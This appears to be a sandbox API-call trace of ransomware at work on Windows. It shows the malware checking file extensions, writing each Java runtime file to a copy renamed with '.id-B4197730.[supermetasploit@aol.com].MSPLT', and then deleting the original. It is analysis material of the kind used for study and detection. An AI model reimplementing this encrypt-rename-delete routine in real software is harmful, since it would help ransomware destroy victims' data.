(lpString=".xls") returned 4 [0297.460] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0297.460] lstrlenW (lpString=".xlsx") returned 5 [0297.460] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0297.460] lstrlenW (lpString=".ppt") returned 4 [0297.460] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0297.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.460] lstrlenW (lpString=".zip") returned 4 [0297.460] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0297.460] lstrlenW (lpString=".rar") returned 4 [0297.460] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0297.460] lstrlenW (lpString=".bz2") returned 4 [0297.460] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0297.460] lstrlenW (lpString=".7z") returned 3 [0297.460] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0297.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.460] lstrlenW (lpString=".dbf") returned 4 [0297.461] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0297.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.461] lstrlenW (lpString=".1cd") returned 4 [0297.461] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0297.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.461] lstrlenW (lpString=".jpg") returned 4 [0297.461] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0297.461] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0297.461] lstrlenW (lpString="hprof.dll") returned 9 [0297.461] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0298.071] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=158272) returned 1 [0298.071] CloseHandle (hObject=0x42c) returned 1 [0298.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll")) returned 0x20 [0298.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.097] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0298.098] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.098] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.098] lstrlenW (lpString=".doc") returned 4 [0298.098] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0298.098] lstrlenW (lpString=".docx") returned 5 [0298.098] lstrcmpiW (lpString1=".docx", lpString2="f.dll") returned -1 [0298.098] lstrlenW (lpString=".pdf") returned 4 [0298.098] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0298.098] lstrlenW (lpString=".xls") returned 4 [0298.098] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0298.098] lstrlenW (lpString=".xlsx") returned 5 [0298.098] lstrcmpiW (lpString1=".xlsx", lpString2="f.dll") returned -1 [0298.098] lstrlenW (lpString=".ppt") returned 4 [0298.098] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0298.098] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.098] lstrlenW (lpString=".zip") returned 4 [0298.098] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0298.098] lstrlenW (lpString=".rar") returned 4 [0298.098] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0298.098] lstrlenW (lpString=".bz2") returned 4 [0298.098] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0298.098] lstrlenW (lpString=".7z") returned 3 [0298.098] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0298.098] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.098] lstrlenW (lpString=".dbf") returned 4 [0298.099] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0298.099] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.099] lstrlenW (lpString=".1cd") returned 4 [0298.099] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0298.099] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.099] lstrlenW (lpString=".jpg") returned 4 [0298.099] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0298.099] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.099] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.099] lstrlenW (lpString=".doc") returned 4 [0298.100] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0298.100] lstrlenW (lpString=".docx") returned 5 [0298.100] lstrcmpiW (lpString1=".docx", lpString2="f.dll") returned -1 [0298.100] lstrlenW (lpString=".pdf") returned 4 [0298.100] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0298.100] lstrlenW (lpString=".xls") returned 4 [0298.100] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0298.100] lstrlenW (lpString=".xlsx") returned 5 [0298.100] lstrcmpiW (lpString1=".xlsx", lpString2="f.dll") returned -1 [0298.100] lstrlenW (lpString=".ppt") returned 4 [0298.100] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0298.100] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.100] lstrlenW (lpString=".zip") returned 4 [0298.100] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0298.100] lstrlenW (lpString=".rar") returned 4 [0298.101] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0298.101] lstrlenW (lpString=".bz2") returned 4 [0298.101] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0298.101] lstrlenW (lpString=".7z") returned 3 [0298.101] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0298.101] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.101] lstrlenW (lpString=".dbf") returned 4 [0298.101] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0298.101] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.101] lstrlenW (lpString=".1cd") returned 4 [0298.101] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0298.101] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll") returned 48 [0298.101] lstrlenW (lpString=".jpg") returned 4 [0298.101] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0298.101] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0298.101] lstrlenW (lpString="charsets.jar") returned 12 [0298.101] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0298.431] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=3036922) returned 1 [0298.431] CloseHandle (hObject=0x4c0) returned 1 [0298.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar")) returned 0x20 [0298.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.432] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0298.433] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.433] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.433] lstrlenW (lpString=".doc") returned 4 [0298.433] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0298.433] lstrlenW (lpString=".docx") returned 5 [0298.433] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0298.433] lstrlenW (lpString=".pdf") returned 4 [0298.433] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0298.433] lstrlenW (lpString=".xls") returned 4 [0298.433] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0298.433] lstrlenW (lpString=".xlsx") returned 5 [0298.433] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0298.433] lstrlenW (lpString=".ppt") returned 4 [0298.433] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0298.433] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.433] lstrlenW (lpString=".zip") returned 4 [0298.433] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0298.433] lstrlenW (lpString=".rar") returned 4 [0298.433] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0298.433] lstrlenW (lpString=".bz2") returned 4 [0298.433] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0298.433] lstrlenW (lpString=".7z") returned 3 [0298.433] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0298.433] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.433] lstrlenW (lpString=".dbf") returned 4 [0298.433] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0298.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.434] lstrlenW (lpString=".1cd") returned 4 [0298.434] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0298.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.434] lstrlenW (lpString=".jpg") returned 4 [0298.434] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0298.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.434] lstrlenW (lpString=".doc") returned 4 [0298.434] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0298.434] lstrlenW (lpString=".docx") returned 5 [0298.434] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0298.434] lstrlenW (lpString=".pdf") returned 4 [0298.434] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0298.434] lstrlenW (lpString=".xls") returned 4 [0298.434] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0298.434] lstrlenW (lpString=".xlsx") returned 5 [0298.434] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0298.434] lstrlenW (lpString=".ppt") returned 4 [0298.434] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0298.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.434] lstrlenW (lpString=".zip") returned 4 [0298.434] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0298.434] lstrlenW (lpString=".rar") returned 4 [0298.434] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0298.434] lstrlenW (lpString=".bz2") returned 4 [0298.434] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0298.435] lstrlenW (lpString=".7z") returned 3 [0298.435] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0298.435] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.435] lstrlenW (lpString=".dbf") returned 4 [0298.435] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0298.435] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.435] lstrlenW (lpString=".1cd") returned 4 [0298.435] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0298.435] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 51 [0298.435] lstrlenW (lpString=".jpg") returned 4 [0298.435] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0298.435] lstrcmpiW (lpString1=".0_144\\lib\\classlist", lpString2=".MSPLT") returned -1 [0298.435] lstrlenW (lpString="classlist") returned 9 [0298.435] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0298.436] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=84355) returned 1 [0298.436] CloseHandle (hObject=0x4c0) returned 1 [0298.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist")) returned 0x20 [0298.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.437] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0298.437] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.437] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.437] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0298.438] GetLastError () returned 0x0 [0298.438] ReadFile (in: hFile=0x4c0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x14983, lpOverlapped=0x0) returned 1 [0298.446] WriteFile (in: hFile=0x46c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x14990, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x14990, lpOverlapped=0x0) returned 1 [0298.449] ReadFile (in: hFile=0x4c0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.449] WriteFile (in: hFile=0x46c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe6, lpOverlapped=0x0) returned 1 [0298.449] SetEndOfFile (hFile=0x46c) returned 1 [0298.449] CloseHandle (hObject=0x46c) returned 1 [0298.453] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.453] SetEndOfFile (hFile=0x4c0) returned 1 [0298.462] CloseHandle (hObject=0x4c0) returned 1 [0298.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.462] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist")) returned 1 [0298.464] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.464] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.464] lstrlenW (lpString=".doc") returned 4 [0298.464] lstrcmpiW (lpString1=".doc", lpString2="list") returned -1 [0298.464] lstrlenW (lpString=".docx") returned 5 [0298.464] lstrcmpiW (lpString1=".docx", lpString2="slist") returned -1 [0298.464] lstrlenW (lpString=".pdf") returned 4 [0298.464] lstrcmpiW (lpString1=".pdf", lpString2="list") returned -1 [0298.464] lstrlenW (lpString=".xls") returned 4 [0298.464] lstrcmpiW (lpString1=".xls", lpString2="list") returned -1 [0298.464] lstrlenW (lpString=".xlsx") returned 5 [0298.464] lstrcmpiW (lpString1=".xlsx", lpString2="slist") returned -1 [0298.464] lstrlenW (lpString=".ppt") returned 4 [0298.464] lstrcmpiW (lpString1=".ppt", lpString2="list") returned -1 [0298.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.465] lstrlenW (lpString=".zip") returned 4 [0298.465] lstrcmpiW (lpString1=".zip", lpString2="list") returned -1 [0298.465] lstrlenW (lpString=".rar") returned 4 [0298.465] lstrcmpiW (lpString1=".rar", lpString2="list") returned -1 [0298.465] lstrlenW (lpString=".bz2") returned 4 [0298.465] lstrcmpiW (lpString1=".bz2", lpString2="list") returned -1 [0298.465] lstrlenW (lpString=".7z") returned 3 [0298.465] lstrcmpiW (lpString1=".7z", lpString2="ist") returned -1 [0298.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.465] lstrlenW (lpString=".dbf") returned 4 [0298.465] lstrcmpiW (lpString1=".dbf", lpString2="list") returned -1 [0298.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.465] lstrlenW (lpString=".1cd") returned 4 [0298.465] lstrcmpiW (lpString1=".1cd", lpString2="list") returned -1 [0298.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.465] lstrlenW (lpString=".jpg") returned 4 [0298.465] lstrcmpiW (lpString1=".jpg", lpString2="list") returned -1 [0298.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.465] lstrlenW (lpString=".doc") returned 4 [0298.465] lstrcmpiW (lpString1=".doc", lpString2="list") returned -1 [0298.465] lstrlenW (lpString=".docx") returned 5 [0298.465] lstrcmpiW (lpString1=".docx", lpString2="slist") returned -1 [0298.465] lstrlenW (lpString=".pdf") returned 4 [0298.466] lstrcmpiW (lpString1=".pdf", lpString2="list") returned -1 [0298.466] lstrlenW (lpString=".xls") returned 4 [0298.466] lstrcmpiW (lpString1=".xls", lpString2="list") returned -1 [0298.466] lstrlenW (lpString=".xlsx") returned 5 [0298.466] lstrcmpiW (lpString1=".xlsx", lpString2="slist") returned -1 [0298.466] lstrlenW (lpString=".ppt") returned 4 [0298.466] lstrcmpiW (lpString1=".ppt", lpString2="list") returned -1 [0298.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.466] lstrlenW (lpString=".zip") returned 4 [0298.466] lstrcmpiW (lpString1=".zip", lpString2="list") returned -1 [0298.466] lstrlenW (lpString=".rar") returned 4 [0298.466] lstrcmpiW (lpString1=".rar", lpString2="list") returned -1 [0298.466] lstrlenW (lpString=".bz2") returned 4 [0298.466] lstrcmpiW (lpString1=".bz2", lpString2="list") returned -1 [0298.466] lstrlenW (lpString=".7z") returned 3 [0298.466] lstrcmpiW (lpString1=".7z", lpString2="ist") returned -1 [0298.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.466] lstrlenW (lpString=".dbf") returned 4 [0298.466] lstrcmpiW (lpString1=".dbf", lpString2="list") returned -1 [0298.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.466] lstrlenW (lpString=".1cd") returned 4 [0298.466] lstrcmpiW (lpString1=".1cd", lpString2="list") returned -1 [0298.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 48 [0298.466] lstrlenW (lpString=".jpg") returned 4 [0298.466] lstrcmpiW (lpString1=".jpg", lpString2="list") returned -1 [0298.467] lstrcmpiW (lpString1=".pf", lpString2=".MSPLT") returned 1 [0298.467] lstrlenW (lpString="CIEXYZ.pf") returned 9 [0298.467] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0298.661] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=51236) returned 1 [0298.661] CloseHandle (hObject=0x4d8) returned 1 [0298.804] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf")) returned 0x20 [0299.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.381] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0299.381] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.381] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.381] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0299.382] GetLastError () returned 0x0 [0299.382] ReadFile (in: hFile=0x378, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xc824, lpOverlapped=0x0) returned 1 [0299.429] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xc830, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xc830, lpOverlapped=0x0) returned 1 [0299.431] ReadFile (in: hFile=0x378, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.431] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe6, lpOverlapped=0x0) returned 1 [0299.431] SetEndOfFile (hFile=0x470) returned 1 [0299.431] CloseHandle (hObject=0x470) returned 1 [0299.434] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.434] SetEndOfFile (hFile=0x378) returned 1 [0299.443] CloseHandle (hObject=0x378) returned 1 [0299.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0299.444] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf")) returned 1 [0299.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.445] lstrlenW (lpString=".doc") returned 4 [0299.445] lstrcmpiW (lpString1=".doc", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString=".docx") returned 5 [0299.445] lstrcmpiW (lpString1=".docx", lpString2="YZ.pf") returned -1 [0299.445] lstrlenW (lpString=".pdf") returned 4 [0299.445] lstrcmpiW (lpString1=".pdf", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString=".xls") returned 4 [0299.445] lstrcmpiW (lpString1=".xls", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString=".xlsx") returned 5 [0299.445] lstrcmpiW (lpString1=".xlsx", lpString2="YZ.pf") returned -1 [0299.445] lstrlenW (lpString=".ppt") returned 4 [0299.445] lstrcmpiW (lpString1=".ppt", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.445] lstrlenW (lpString=".zip") returned 4 [0299.445] lstrcmpiW (lpString1=".zip", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString=".rar") returned 4 [0299.445] lstrcmpiW (lpString1=".rar", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString=".bz2") 